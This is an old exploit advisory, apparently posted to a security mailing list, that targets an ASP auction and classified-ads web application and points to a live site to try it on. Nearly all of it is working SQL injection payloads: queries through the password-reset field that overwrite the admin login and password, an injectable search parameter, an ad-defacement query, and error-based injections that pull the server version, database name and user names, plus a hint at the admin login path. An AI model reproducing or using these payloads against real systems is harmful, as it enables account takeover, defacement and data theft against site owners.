|
Aria-Security Team=0D http://Aria-Security.Net=0D ------------------------------------------=0D Original Advisory @ http://aria-security.net/forum/showthread.php?p=1111=0D Try it online @ http://ads.netauctionhelp.com=0D =0D =0D needed tables:=0D =0D tblMember.id=0D tblMember.login=0D tblMember.pswd=0D =0D Vulnarable Page: Login.asp=0D Run this query for Forget Password=0D -1' UPDATE tblMember Set login= 'admin' where(id='1');--=0D -1' UPDATE tblMember set pswd= 'hacked' Where(id= '1');--=0D =0D =0D there it is, admin with the password hacked=0D =0D ------------------------------------------------------------------------------------=0D these may help the attacker to get more info in the search.asp page=0D =0D /search.asp?sort=ni&category=&categoryname=&kwsearc h=&nsearch=[SQL Injection]=0D =0D =0D tblAd.id,tblAd.imagepath,tblAd.aspectratio,tblAd.t itle,tblAd.zip,tblAd.state,tblAd.startdate'=0D =0D =0D example: -1' update tblAd set title= 'hacked' where(id='1');--=0D site.com/addetl.asp?id=1 will say HACKED.=0D =0D 1' or 1=convert(int,@@version)--=0D 1' or 1=convert(int,@@servername)--=0D 1' or 1=convert(int,db_name())--=0D 1' or 1=convert(int,user_name())--=0D 1' or 1=convert(int,system_user)--=0D =0D =0D hint: /auctionAdmin/admLogin.asp ;)=0D =0D =0D Greetz: AurA=0D Credits goes to Aria-Security Team=0D Regards,=0D The-0utl4w=0D =0D =0D =0D =0D